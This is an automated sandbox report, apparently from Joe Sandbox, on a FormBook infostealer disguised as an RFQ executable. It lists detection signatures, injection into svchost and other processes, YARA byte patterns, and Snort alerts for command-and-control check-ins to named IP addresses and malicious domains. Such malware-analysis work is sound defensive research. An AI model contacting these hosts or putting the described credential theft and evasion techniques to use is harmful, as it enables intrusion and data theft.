Windows Analysis Report
RFQ - MK FMHS.RFQ.24.101.exe

Overview

General Information

Sample name: RFQ - MK FMHS.RFQ.24.101.exe
Analysis ID: 1467353
MD5: c8fe2e7043d030cf93cdab759d44f5e4
SHA1: fb166f49af2527ca5b90fa2538c2520727687331
SHA256: f78ebb5c21f07a42ed4351b7b8639d780f9d99a9afbb749daeaab9af97511acd
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • RFQ - MK FMHS.RFQ.24.101.exe (PID: 6776 cmdline: "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe" MD5: C8FE2E7043D030CF93CDAB759D44F5E4)
    • svchost.exe (PID: 1696 cmdline: "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe (PID: 1396 cmdline: "C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RMActivate_ssp.exe (PID: 1908 cmdline: "C:\Windows\SysWOW64\RMActivate_ssp.exe" MD5: 6599A09C160036131E4A933168DA245F)
          • bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe (PID: 2844 cmdline: "C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2424 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
          • xl9lsbb.exe (PID: 5268 cmdline: "C:\Users\user\AppData\Local\Temp\xl9lsbb.exe" MD5: C2F2B08E34FC25D172F2C3FCAB1ACFEB)
            • xl9lsbb.exe (PID: 888 cmdline: "C:\Users\user\AppData\Local\Temp\xl9lsbb.exe" MD5: C2F2B08E34FC25D172F2C3FCAB1ACFEB)
              • bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe (PID: 3696 cmdline: "C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                • runonce.exe (PID: 6240 cmdline: "C:\Windows\SysWOW64\runonce.exe" MD5: 9E16655119DDE1B24A741C4FD4AD08FC)
                  • bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe (PID: 3760 cmdline: "C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                  • firefox.exe (PID: 7012 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches in memory dumps (Source / Rule / Description / Author / Strings):
  • Source: 00000001.00000002.1749592251.0000000002500000.00000040.80000000.00040000.00000000.sdmp
    Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  • Source: 00000001.00000002.1749592251.0000000002500000.00000040.80000000.00040000.00000000.sdmp
    Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    Strings:
      • 0x2db43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x17292:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • Source: 0000000E.00000002.4104203005.0000000006D70000.00000040.00000001.00040000.00000000.sdmp
    Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  • Source: 0000000E.00000002.4104203005.0000000006D70000.00000040.00000001.00040000.00000000.sdmp
    Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    Strings:
      • 0x220fb:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xb6ca:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • Source: 0000000F.00000002.4101074559.0000000000630000.00000040.80000000.00040000.00000000.sdmp
    Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  (28 entries in total; the remaining entries are not shown here)

Yara matches in unpacked PE files (Source / Rule / Description / Author / Strings):
  • Source: 1.2.svchost.exe.2500000.0.raw.unpack
    Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  • Source: 1.2.svchost.exe.2500000.0.raw.unpack
    Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    Strings:
      • 0x2db43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x17292:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • Source: 13.2.xl9lsbb.exe.400000.0.unpack
    Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  • Source: 13.2.xl9lsbb.exe.400000.0.unpack
    Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    Strings:
      • 0x2d393:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x16962:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • Source: 13.2.xl9lsbb.exe.400000.0.raw.unpack
    Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  (3 entries in total; the remaining entries are not shown here)

System Summary

Sigma rule matches (Uncommon Svchost Parent Process):
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe", CommandLine: "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe", ParentImage: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe, ParentProcessId: 6776, ParentProcessName: RFQ - MK FMHS.RFQ.24.101.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe", ProcessId: 1696, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe", CommandLine: "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe", ParentImage: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe, ParentProcessId: 6776, ParentProcessName: RFQ - MK FMHS.RFQ.24.101.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe", ProcessId: 1696, ProcessName: svchost.exe
Snort IDS alerts (all TCP to destination port 80; classtype "A Network Trojan was detected"):
Timestamp                 SID      Source Port  Destination Port  Protocol  Classtype
07/04/24-03:12:38.577180  2855464  49761        80                TCP       A Network Trojan was detected
07/04/24-03:12:35.806170  2855464  49758        80                TCP       A Network Trojan was detected
07/04/24-03:13:29.265779  2855465  49771        80                TCP       A Network Trojan was detected
07/04/24-03:13:47.726029  2855464  49775        80                TCP       A Network Trojan was detected
07/04/24-03:11:49.918725  2855465  49749        80                TCP       A Network Trojan was detected
07/04/24-03:11:30.935623  2855464  49743        80                TCP       A Network Trojan was detected
07/04/24-03:13:25.838396  2855464  49769        80                TCP       A Network Trojan was detected
07/04/24-03:11:42.301664  2855464  49746        80                TCP       A Network Trojan was detected
07/04/24-03:10:37.155346  2855464  49737        80                TCP       A Network Trojan was detected
07/04/24-03:12:43.659425  2855465  49763        80                TCP       A Network Trojan was detected
07/04/24-03:13:12.602462  2855464  49765        80                TCP       A Network Trojan was detected
07/04/24-03:12:24.376986  2855465  49753        80                TCP       A Network Trojan was detected
07/04/24-03:10:44.897966  2855465  49740        80                TCP       A Network Trojan was detected
07/04/24-03:13:52.790653  2855465  49779        80                TCP       A Network Trojan was detected
07/04/24-03:13:53.626059  2855465  49780        80                TCP       A Network Trojan was detected
07/04/24-03:11:28.369643  2855464  49742        80                TCP       A Network Trojan was detected
07/04/24-03:13:45.175297  2855464  49773        80                TCP       A Network Trojan was detected
07/04/24-03:13:10.075816  2855464  49764        80                TCP       A Network Trojan was detected
07/04/24-03:12:16.585944  2855464  49750        80                TCP       A Network Trojan was detected
07/04/24-03:13:30.898164  2855465  49772        80                TCP       A Network Trojan was detected
07/04/24-03:13:46.020455  2855464  49774        80                TCP       A Network Trojan was detected
07/04/24-03:13:17.664187  2855465  49767        80                TCP       A Network Trojan was detected
07/04/24-03:12:19.121759  2855464  49751        80                TCP       A Network Trojan was detected
07/04/24-03:10:20.795048  2855465  49736        80                TCP       A Network Trojan was detected
07/04/24-03:11:44.836772  2855464  49747        80                TCP       A Network Trojan was detected
07/04/24-03:13:23.294796  2855464  49768        80                TCP       A Network Trojan was detected
07/04/24-03:11:36.007994  2855465  49745        80                TCP       A Network Trojan was detected
07/04/24-03:10:39.695122  2855464  49738        80                TCP       A Network Trojan was detected
07/04/24-03:13:48.555866  2855464  49776        80                TCP       A Network Trojan was detected

AV Detection

Source: http://www.binpvae.lol/kfqo/; Avira URL Cloud: Label: malware
Source: www.hsck520.com; Virustotal: Detection: 5%
Source: www.qmancha.com; Virustotal: Detection: 8%
Source: http://www.hsck520.com; Virustotal: Detection: 5%
Source: RFQ - MK FMHS.RFQ.24.101.exe; ReversingLabs: Detection: 36%
Source: RFQ - MK FMHS.RFQ.24.101.exe; Virustotal: Detection: 36%
Source: Yara match; File source: 1.2.svchost.exe.2500000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 13.2.xl9lsbb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 13.2.xl9lsbb.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.svchost.exe.2500000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000001.00000002.1749592251.0000000002500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.4104203005.0000000006D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.4101074559.0000000000630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.4103858952.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.4103945476.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.3649278175.0000000005330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.3649137742.00000000016B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1750132612.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1749816358.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4104107521.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.3647567861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.4103523467.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.4103630939.0000000003A30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4101142200.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4104284280.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.4105348256.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\VT3g2PdlLRVpwBp[1].exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe; Joe Sandbox ML: detected
Source: RFQ - MK FMHS.RFQ.24.101.exe; Joe Sandbox ML: detected
Source: RFQ - MK FMHS.RFQ.24.101.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: Binary string: WeSe.pdb source: VT3g2PdlLRVpwBp[1].exe.3.dr, xl9lsbb.exe.3.dr
              Source: Binary string: WeSe.pdbSHA256F source: VT3g2PdlLRVpwBp[1].exe.3.dr, xl9lsbb.exe.3.dr
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4101090653.000000000055E000.00000002.00000001.01000000.00000004.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4102484254.000000000055E000.00000002.00000001.01000000.00000004.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 0000000E.00000002.4101091867.000000000055E000.00000002.00000001.01000000.00000004.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000010.00000000.3711234727.000000000055E000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: runonce.pdbGCTL source: xl9lsbb.exe, 0000000D.00000002.3647968012.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 0000000E.00000002.4102514343.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rmactivate_ssp.pdb source: svchost.exe, 00000001.00000003.1717916965.0000000003501000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1715600420.000000000281A000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4102474122.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4110602768.0000000006950000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000003.1639103440.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000003.1639005571.0000000003D20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1749836614.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1641789169.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1749836614.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1643485880.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4105069211.0000000003B6E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1749852012.000000000367B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4105069211.00000000039D0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1751433381.0000000003820000.00000004.00000020.00020000.00000000.sdmp, xl9lsbb.exe, 0000000D.00000002.3648250842.0000000001360000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3647970854.00000000041C0000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3649509708.000000000437F000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4104187209.00000000046CE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4104187209.0000000004530000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000003.1639103440.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000003.1639005571.0000000003D20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1749836614.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1641789169.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1749836614.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1643485880.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, RMActivate_ssp.exe, 00000003.00000002.4105069211.0000000003B6E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1749852012.000000000367B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4105069211.00000000039D0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1751433381.0000000003820000.00000004.00000020.00020000.00000000.sdmp, xl9lsbb.exe, 0000000D.00000002.3648250842.0000000001360000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3647970854.00000000041C0000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3649509708.000000000437F000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4104187209.00000000046CE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4104187209.0000000004530000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: svchost.pdb source: RMActivate_ssp.exe, 00000003.00000002.4106518555.0000000003FFC000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4101608329.0000000003362000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.00000000025FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2030768757.000000003D8DC000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: runonce.pdb source: xl9lsbb.exe, 0000000D.00000002.3647968012.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 0000000E.00000002.4102514343.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: svchost.pdbUGP source: RMActivate_ssp.exe, 00000003.00000002.4106518555.0000000003FFC000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4101608329.0000000003362000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.00000000025FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2030768757.000000003D8DC000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: rmactivate_ssp.pdbGCTL source: svchost.exe, 00000001.00000003.1717916965.0000000003501000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1715600420.000000000281A000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4102474122.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4110602768.0000000006950000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe; Code function: 0_2_00ED4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00ED4696
Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe; Code function: 0_2_00EDC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00EDC9C7
Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe; Code function: 0_2_00EDC93C FindFirstFileW,FindClose,0_2_00EDC93C
Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe; Code function: 0_2_00EDF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EDF200
Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe; Code function: 0_2_00EDF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EDF35D
Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe; Code function: 0_2_00EDF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EDF65E
Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe; Code function: 0_2_00ED3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00ED3A2B
Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe; Code function: 0_2_00ED3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00ED3D4E
Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe; Code function: 0_2_00EDBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EDBF27
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 3_2_02FBBBE0 FindFirstFileW,FindNextFileW,FindClose,3_2_02FBBBE0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4x nop then xor eax, eax 3_2_02FA9730
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4x nop then mov ebx, 00000004h 3_2_03790544

Networking

Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49736 -> 165.154.0.120:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49737 -> 116.213.43.190:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49738 -> 116.213.43.190:80
Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49740 -> 116.213.43.190:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49742 -> 207.148.37.252:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49743 -> 207.148.37.252:80
Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49745 -> 207.148.37.252:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49746 -> 116.213.43.190:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49747 -> 116.213.43.190:80
Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49749 -> 116.213.43.190:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49750 -> 203.161.55.102:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49751 -> 203.161.55.102:80
Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49753 -> 203.161.55.102:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49758 -> 116.213.43.190:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49761 -> 116.213.43.190:80
Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49763 -> 116.213.43.190:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49764 -> 13.248.169.48:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49765 -> 13.248.169.48:80
Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49767 -> 13.248.169.48:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49768 -> 38.47.232.224:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49769 -> 38.47.232.224:80
Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49771 -> 162.241.253.174:80
Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49772 -> 38.47.232.224:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49773 -> 35.190.52.58:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49774 -> 202.95.21.152:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49775 -> 35.190.52.58:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49776 -> 202.95.21.152:80
